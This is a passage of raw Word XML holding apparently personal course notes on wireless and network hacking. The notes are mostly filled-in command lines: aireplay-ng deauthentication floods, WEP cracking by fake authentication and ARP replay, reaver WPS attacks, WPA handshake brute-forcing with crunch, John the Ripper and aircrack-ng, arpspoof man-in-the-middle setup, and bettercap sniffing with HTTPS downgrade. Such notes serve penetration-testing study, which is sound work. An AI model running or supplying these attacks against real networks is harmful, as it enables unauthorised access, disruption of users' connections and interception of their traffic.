        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - -channel 2</w:t>
      </w:r>
      <w:r w:rsidR="00BD6321" w:rsidRPr="00A1442C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve"> mon0</w:t>
      </w:r>
      <w:r w:rsidR="00AF3A6D">
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBDB633" w14:textId="4503C235" w:rsidR="006879FC" w:rsidRDefault="006879FC" w:rsidP="00C317E2"/>
    <w:p w14:paraId="3C3E3283" w14:textId="350BF8FB" w:rsidR="006879FC" w:rsidRDefault="006879FC" w:rsidP="009271BD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Storing the sniffed packets in a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519B3506" w14:textId="0F0A23EF" w:rsidR="00AF3A6D" w:rsidRPr="00A1442C" w:rsidRDefault="00BD6321" w:rsidP="006879FC">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1442C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="006879FC" w:rsidRPr="00A1442C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve">irodump-ng - -bssid [target bssid] - -channel [channel number] - -write [name of file] [wireless adapter on monitor mode name] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0202DD73" w14:textId="5E29EC00" w:rsidR="006879FC" w:rsidRDefault="00AF3A6D" w:rsidP="00C317E2">
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00A1442C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>airodump-ng - -bssid F8:23:B2:B9:50:A8 - -channel 2 - -write test-01 mon0</w:t>
      </w:r>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E676E4B" w14:textId="3751A84B" w:rsidR="006879FC" w:rsidRPr="00C317E2" w:rsidRDefault="00AF3A6D" w:rsidP="00C317E2">
      <w:r>
        <w:t>The above show an additional section showing the clients connected to the wireless network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F89700C" w14:textId="3F536CC5" w:rsidR="00C317E2" w:rsidRDefault="00C317E2" w:rsidP="00AE1E77"/>
    <w:p w14:paraId="7E8085AC" w14:textId="54169B6D" w:rsidR="009271BD" w:rsidRDefault="009271BD" w:rsidP="009271BD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disconnecting the devices or clients from wireless networks (Deauthentication attack) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02557D8B" w14:textId="5D37DCEA" w:rsidR="009271BD" w:rsidRDefault="009271BD" w:rsidP="009271BD">
      <w:r>
        <w:t>Kind of like MITM attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EFD19B" w14:textId="36D7D290" w:rsidR="00BD6321" w:rsidRPr="00A1442C" w:rsidRDefault="00BD6321" w:rsidP="009271BD">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1442C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="009271BD" w:rsidRPr="00A1442C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>ireplay-ng - -deauth [large number of deauthentication packets</w:t>
      </w:r>
      <w:r w:rsidRPr="00A1442C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve"> to keep client disconnected</w:t>
      </w:r>
      <w:r w:rsidR="009271BD" w:rsidRPr="00A1442C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>] -a [target wireless network MAC address] -c [Client MAC address] -D [external wireless adapter in monitor mode]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E3ECD6" w14:textId="591D7DCC" w:rsidR="00BD6321" w:rsidRDefault="00A1442C" w:rsidP="009271BD">
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidR="00BD6321" w:rsidRPr="00A1442C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>aireplay-ng –deauth 10000000000 -a F8:23:B2:B9:50:A8 -c 80:E6:50:22:A2:E8 -D mon0</w:t>
      </w:r>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D63FD08" w14:textId="77777777" w:rsidR="00BD6321" w:rsidRDefault="009271BD" w:rsidP="00AE1E77">
      <w:r>
        <w:t xml:space="preserve"> (-D for 5G networks)</w:t>
      </w:r>
      <w:r w:rsidR="00BD6321">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002DB158" w14:textId="01ABD896" w:rsidR="00BD6321" w:rsidRDefault="00BD6321" w:rsidP="00BD6321">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495E7E49" w14:textId="04CFA7FB" w:rsidR="00BD6321" w:rsidRDefault="00BD6321" w:rsidP="00BD6321">
      <w:r>
        <w:t>Run the two codes together:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2804117C" w14:textId="2B7BD9C7" w:rsidR="00BD6321" w:rsidRPr="00A1442C" w:rsidRDefault="00BD6321" w:rsidP="00BD6321">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1442C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve">airodump-ng - -bssid [target bssid] - -channel [channel number] - -write [name of file] [wireless adapter on monitor mode name] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383C6134" w14:textId="77777777" w:rsidR="00BD6321" w:rsidRPr="00A1442C" w:rsidRDefault="00BD6321" w:rsidP="00BD6321">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1442C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>aireplay-ng - -deauth [large number of deauthentication packets to keep client disconnected] -a [target wireless network MAC address] -c [Client MAC address] -D [external wireless adapter in monitor mode]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F50D17" w14:textId="77777777" w:rsidR="00BD6321" w:rsidRDefault="00BD6321" w:rsidP="00AE1E77"/>
    <w:p w14:paraId="751D5779" w14:textId="5EFBCE3A" w:rsidR="003E35C8" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Cracking WEP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D236F98" w14:textId="163C312D" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00AD7020">
      <w:r>
        <w:t>Run aircrack-ng while running airodump-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E375647" w14:textId="7F7F4C5F" w:rsidR="00A1442C" w:rsidRPr="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00AD7020">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00A1442C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>irodump-ng - -bssid [network MAC] - -channel 3 - -write test-01 wlan0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA7B3DC" w14:textId="03B6C5B0" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00AD7020">
      <w:r w:rsidRPr="00A1442C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>aircrack-ng [.cap file]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r w:rsidRPr="00A1442C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>aircrack-ng test-01.cap</w:t>
      </w:r>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CAA398" w14:textId="19F2A99B" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00AD7020"/>
    <w:p w14:paraId="0D61594E" w14:textId="2D919034" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Slow Packets problem from airodump-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4455E6F1" w14:textId="1ABF5849" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00AD7020">
      <w:r>
        <w:t>Step 1 - Run a fake authentication: (terminal 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8FCCE3" w14:textId="0F0DD926" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00AD7020">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>aireplay-ng  - -fakeauth [number of times to send fake authentication, 0 meaning once etc] -a [MAC Address of network] -h [MAC address of my wireless adapter] [external wireless adapter in monitor mode] { aireplay-ng - -fakeauth 0 -a 64:14:44:F0:33:33 -h 48:33:3d:33:2d:33 mon0}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21504885" w14:textId="2352C974" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00AD7020">
      <w:r>
        <w:t>Step 2 – Force AP to generate new IVs using ARP request and replay it (terminal 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCD04A7" w14:textId="3A0730CC" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>aireplay-ng  - -arpreplay -b [MAC Address of network] -h [MAC address of my wireless adapter] [external wireless adapter in monitor mode] { aireplay-ng - -arpreplay -b 64:14:44:F0:33:33 -h 48:33:3d:33:2d:33 mon0}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E7CACA" w14:textId="713E28E3" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>NOTE: These two codes should be ran while airodump-ng is write the packets to a .cap file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD27B91" w14:textId="77777777" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00AD7020"/>
    <w:p w14:paraId="33BCD1AB" w14:textId="4AFD694F" w:rsidR="00F51924" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Cracking WPA/WPA2 using non-Push Button WPS using wash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7960B94A" w14:textId="4699CD49" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00AD7020">
      <w:r>
        <w:t>Step 1- Display all networks around with wps enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15654070" w14:textId="4811D4AC" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00AD7020">
      <w:r>
        <w:t>wash - –interface mon0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5AFDD2" w14:textId="28562B4A" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00AD7020">
      <w:r>
        <w:t>Step 2 – Associate with the network using aireplay-ng –fakeauth 30 -a [MAC network] -h [MAC external adapter (don’t forget to convert 34-33….. to 34:33] wlan0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC78310" w14:textId="06DC7BB5" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00AD7020">
      <w:r>
        <w:t>In another terminal run reaver: reaver - -bssid [MAC address of target network] - -channel 1 - -interface wlan0 -vvv - -no-associate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F33B1D5" w14:textId="6F18A12D" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00AD7020">
      <w:r>
        <w:t>(-vvv is to show information in case of fail)(--no-associate is to tell reaver not to associate because it is already associating manually</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEC1B42" w14:textId="62DE79A2" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00AD7020"/>
    <w:p w14:paraId="0BED20B5" w14:textId="60EA13D7" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cracking WPA/WPA2 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F08090F" w14:textId="5F4B34DB" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>Step 1- Run airodump-ng and store packets of specific target network to a file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6337A3B4" w14:textId="7AB09BBB" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>Step 2- Capture handshake: Wait for new client to connect to network so as to capture handshake (these are 4 packets that are sent when a new client connects). Alternatively in another terminal, run a deauth attack for a very short time using aireplay-ng to disconnect the already connected and reconnect it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4057B9" w14:textId="219CA5FA" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>The handshake gotten doesn’t contain the password but can help verify the correctly guessed password from a bruteforce attack wordlist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A09438F" w14:textId="00BDA7F9" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>Step3 – Create a wordlist using crunch: &gt;crunch [min # of characters][max # of characters][characters] -t[pattern] -o[filename to store the password.txt] {&gt;crunch 6 8 123abc$# -t a@@@@b } (-t a @@@@b means all the passwords will have a pattern which starts with a and ends with b e.g aaaaaab or aabbbb or aann$#b)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF06BD4" w14:textId="6D3B8784" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>Step 4 – run aircrack0n: aircrack-ng [handshake file with .cap] -w [wordlist file]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCAC5E5" w14:textId="4116AE3E" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C"/>
    <w:p w14:paraId="1E276860" w14:textId="38646F9D" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Advanced wordlists creation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001AB59A" w14:textId="22F5C891" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Using John the ripper to save progress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDE0308" w14:textId="60F33C1C" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>John - -wordlist=[name of wordlist] - -stdout (uses john the ripper to view the wordlist and print on a standard output)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E55EC3D" w14:textId="1D213BC6" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>To use this wordlist output as an input for aircrack-ng we use the pipe comman( |)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFECD82" w14:textId="0E26994E" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>John –wordlist=[name of wordlist] - -stdout - -session=[name of session] | aircrack-ng -w -  -b [MAC address of target network] [handshake .cap file] (-w – means the wordlist is piped from the result of the previous command; - -session=[any name] creates a session for john the ripper)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C60221" w14:textId="188883C0" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Resuming session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4833255B" w14:textId="78B0EB17" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>John - -restore=[session name] | aircrack-ng -w -  -b [Target MAC] [handshake .cap file]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1283F9E9" w14:textId="05452546" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>We use John the ripper to store and resume session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5C8869" w14:textId="48B39445" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Using Piping wordlist to save storage space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55606049" w14:textId="0BE2F206" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>e.g crunch 8 8 | aircrack-ng -b [Target MAC] -w – handshake-01.cap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEFF577" w14:textId="27EF1B8D" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>Using Piping and progress saver to crack wpa/wpa2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D2B7A2" w14:textId="1B00BBAE" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>Crunch 8 8 | john - - stdin - -session=session1 - -stdout | aircrack-ng -b [MAC BSSID] -w – handshake-01.cap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062CB252" w14:textId="070E6EC9" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>Restoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7666BFD8" w14:textId="4A16B491" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>Crunch 8 8 | john - -restore=session1 | aircrack-ng -b [target MAC] -w – handshake-01.cap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6419F823" w14:textId="53515245" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C"/>
    <w:p w14:paraId="0924A52B" w14:textId="77777777" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>ARP spoof (Man in the middle attack)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE119B1" w14:textId="77777777" w:rsidR="00A1442C" w:rsidRPr="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>To find ip of target and gateway run arp -a on both shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA3888C" w14:textId="77777777" w:rsidR="00A1442C" w:rsidRPr="00AD7020" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r w:rsidRPr="00AD7020">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>arpspoof -i [interface] -t [client target IP] [gateway target IP]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD7020">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>arpspoof -I ether0 -t 10.12.1.2  10.2.3.4</w:t>
      </w:r>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBA3641" w14:textId="77777777" w:rsidR="00A1442C" w:rsidRPr="00AD7020" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r w:rsidRPr="00AD7020">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>arpspoof -i [interface] -t [gateway target IP] [client target IP]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD7020">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>arpspoof -i ether0 10.2.3.4  10.12.1.1</w:t>
      </w:r>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C03BD3" w14:textId="77777777" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C"/>
    <w:p w14:paraId="3AC3C9D2" w14:textId="77777777" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t xml:space="preserve">Port forwarding(allow many packets to flow through the MIMT computer without stopping the internet access):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042251AA" w14:textId="77777777" w:rsidR="00A1442C" w:rsidRPr="00AD7020" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD7020">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>echo 1 &gt; /proc/sys/net/ipv4/ip_forward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CE0F0F" w14:textId="11CF2BCB" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Bettercap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CFCDE2" w14:textId="661A2759" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C"/>
    <w:p w14:paraId="14646FC8" w14:textId="07718BE0" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>Bettercap -iface [interface where internets connected]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0FBB3C" w14:textId="24DE2558" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>2. net.probe on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794B6E84" w14:textId="2AA06488" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>3. help arp.spoof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663D8581" w14:textId="16290B43" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4. net.sniff.local true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA1D1CC" w14:textId="2C1CB42C" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>5. net.sniff on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C35A1A" w14:textId="18BA50B1" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>Help net.probe: opens help for net.probe for finding ip and mac addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB64821" w14:textId="7426F17C" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>Net.show : shows the connected clients</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150B1AFC" w14:textId="42B3E1C9" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>To modify options of bettercap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E9B4AA" w14:textId="39B75B49" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>Set [option to modify] true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A35D7B6" w14:textId="0EA132F1" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C"/>
    <w:p w14:paraId="592C0883" w14:textId="6A355383" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>Analysing the data received from bettercap spoofing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD1C6D9" w14:textId="02EB3813" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>Tell better cap to capture and analyze:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D2EF05" w14:textId="681BA40E" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>help net.sniff (To show all options)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEEFD76" w14:textId="6438C44A" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>net.sniff on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CF2F95" w14:textId="29B5CB0D" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>caplets.show : shows all caplets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3B7AEE" w14:textId="0AE7C1B3" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C"/>
    <w:p w14:paraId="77FE9D35" w14:textId="007F0195" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>Downgrading HTTPS website with bettercap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14967D60" w14:textId="0DB50303" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>caplet.show : shows all caplets then select the caplet that downgrades HTTPS to HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA7C66F" w14:textId="18B3AE6B" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>NOTE: For Chrome, every website link has to be added to the downgrade HTTPS caplet list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E35868" w14:textId="57D8478C" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>Bypassing HSTS with bettercap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513712C6" w14:textId="051AD335" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>The only way is to replace the website with a similar one.</w:t>
      </w:r>
    </w:p>
